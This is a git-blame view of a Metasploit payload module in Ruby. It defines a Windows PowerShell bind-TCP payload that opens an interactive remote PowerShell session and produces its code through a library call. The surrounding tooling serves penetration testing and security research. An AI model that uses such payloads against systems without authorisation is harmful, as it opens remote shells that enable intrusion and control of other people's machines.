Files
metasploit-gs/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

40 lines
1.2 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
2021-01-28 10:35:25 +00:00
require 'rex/powershell'
2016-03-08 14:02:44 +01:00
module MetasploitModule
CachedSize = :dynamic
include Msf::Payload::Single
2015-04-26 00:16:59 +01:00
include Rex::Powershell::Command
2015-05-13 17:26:21 +01:00
include Msf::Payload::Windows::Powershell
def initialize(info = {})
super(merge_info(info,
2015-04-26 09:30:41 +01:00
'Name' => 'Windows Interactive Powershell Session, Bind TCP',
2015-04-26 09:20:29 +01:00
'Description' => 'Interacts with a powershell session on an established socket connection',
2015-05-05 14:24:21 +10:00
'Author' => [
2015-04-26 00:16:59 +01:00
'Ben Turner', # benpturner
'Dave Hardy' # davehardy20
],
2015-05-05 14:24:21 +10:00
'References' => [
2022-01-23 15:28:32 -05:00
['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit']
2015-04-26 00:16:59 +01:00
],
'License' => MSF_LICENSE,
'Platform' => 'windows',
'Arch' => ARCH_CMD,
2015-04-23 14:43:08 +01:00
'Handler' => Msf::Handler::BindTcp,
2015-04-23 23:12:38 +01:00
'Session' => Msf::Sessions::PowerShell,
'RequiredCmd' => 'generic',
2015-05-05 14:24:21 +10:00
'Payload' => { 'Payload' => '' }
))
2015-04-26 00:16:59 +01:00
end
2022-11-04 00:33:03 +00:00
def generate(_opts = {})
2015-05-13 17:26:21 +01:00
generate_powershell_code("Bind")
end
end